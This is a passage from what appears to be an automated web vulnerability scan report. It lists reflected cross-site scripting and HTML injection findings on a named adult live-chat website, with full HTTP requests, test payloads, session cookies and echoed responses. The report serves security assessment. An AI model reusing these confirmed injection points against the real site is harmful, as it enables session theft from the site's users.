GET /live-sex-chats/orgies/?44239'-alert(1)-'0a5659e80e9=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:29 GMT Connection: close Content-Length: 49856 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/orgies/?44239'-alert(1)-'0a5659e80e9=1&qs=cat=1^roomid=14^44239'-alert(1)-'0a5659e80e9=1&qs=cat=1^roomid=14^44239'-alert(1)-'0a5659e80e9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
4.533. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/orgies/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b235"><a>bd631be4c53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/orgies/?4b235"><a>bd631be4c53=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:05 GMT Connection: close Content-Length: 49672 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/orgies/?4b235"><a>bd631be4c53=1"> ...[SNIP]...
4.534. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/pornstars/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad2c2"><a>388c8c895ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/pornstars/?ad2c2"><a>388c8c895ab=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:36 GMT Connection: close Content-Length: 266390 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/pornstars/?ad2c2"><a>388c8c895ab=1"> ...[SNIP]...
4.535. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/pornstars/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd6ca'-alert(1)-'66a39635b46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/pornstars/?dd6ca'-alert(1)-'66a39635b46=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:42 GMT Connection: close Content-Length: 266553 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/pornstars/?dd6ca'-alert(1)-'66a39635b46=1&qs=cat=1^roomid=249^dd6ca'-alert(1)-'66a39635b46=1&qs=cat=1^roomid=249^dd6ca'-alert(1)-'66a39635b46=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63 ...[SNIP]...
4.536. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/role-play/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27f69'-alert(1)-'603afae0b8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/role-play/?27f69'-alert(1)-'603afae0b8e=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:44 GMT Connection: close Content-Length: 54077 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/role-play/?27f69'-alert(1)-'603afae0b8e=1&qs=cat=1^roomid=-999^27f69'-alert(1)-'603afae0b8e=1&qs=cat=1^roomid=-999^27f69'-alert(1)-'603afae0b8e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d ...[SNIP]...
4.537. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/role-play/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43819"><a>7fb20b0957a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/role-play/?43819"><a>7fb20b0957a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:34 GMT Connection: close Content-Length: 53900 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/role-play/?43819"><a>7fb20b0957a=1"> ...[SNIP]...
4.538. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/sex-show-galleries/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd9ca'-alert(1)-'52f7516f46a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-galleries/?cd9ca'-alert(1)-'52f7516f46a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:19 GMT Connection: close Content-Length: 29898 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/content.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-galleries/?cd9ca'-alert(1)-'52f7516f46a=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
4.539. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/sex-show-galleries/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34839"><a>e84c423b110 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/sex-show-galleries/?34839"><a>e84c423b110=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:02 GMT Connection: close Content-Length: 29751 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-galleries/?34839"><a>e84c423b110=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.540. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/sex-show-photos/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71e01'-alert(1)-'ba036a24c83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-photos/?71e01'-alert(1)-'ba036a24c83=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
